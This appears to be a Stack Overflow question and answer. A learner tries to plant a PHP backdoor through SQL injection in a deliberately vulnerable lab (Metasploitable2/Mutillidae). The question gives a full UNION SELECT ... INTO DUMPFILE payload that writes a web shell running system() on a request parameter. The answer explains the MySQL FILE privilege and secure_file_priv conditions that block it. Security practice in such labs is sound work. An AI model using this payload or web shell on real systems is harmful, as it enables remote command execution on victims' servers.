# I need some help sql injection

Tags: php, sql-injection

I'm currently on planting php file on my local server(metasploitable2 mutillidate) using php backdoor program. I found out how many columns the it has and made a simple code.

```
' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){ 
echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; 
}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' --
```

I encoded this code into url form and submitted but I failed.

It gave me the different error from I've got by far but still it doesn't work.

Error says : 'Error executing query : Can't create/write to file '/var/www/mutillidae/backdoor.php'

I guess it's pretty much about privilege but I'm not sure

Comment: You don't have the permission to write to this file...

Comment: @csabinho Thank you! I need to figure out how to escalate my privilege first!

Answer (score 0, accepted):

The MySQL user executing the query has to have the [`FILE`](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_file) privilege in order to use `SELECT ... INTO OUTFILE` or `SELECT ... INTO DUMPFILE`. Also, if the [`secure_file_priv`](https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_secure_file_priv) system variable is set to the pathname of a directory, you can only write to files in that directory.

Comment: Thank you sir I really appreciate your answer!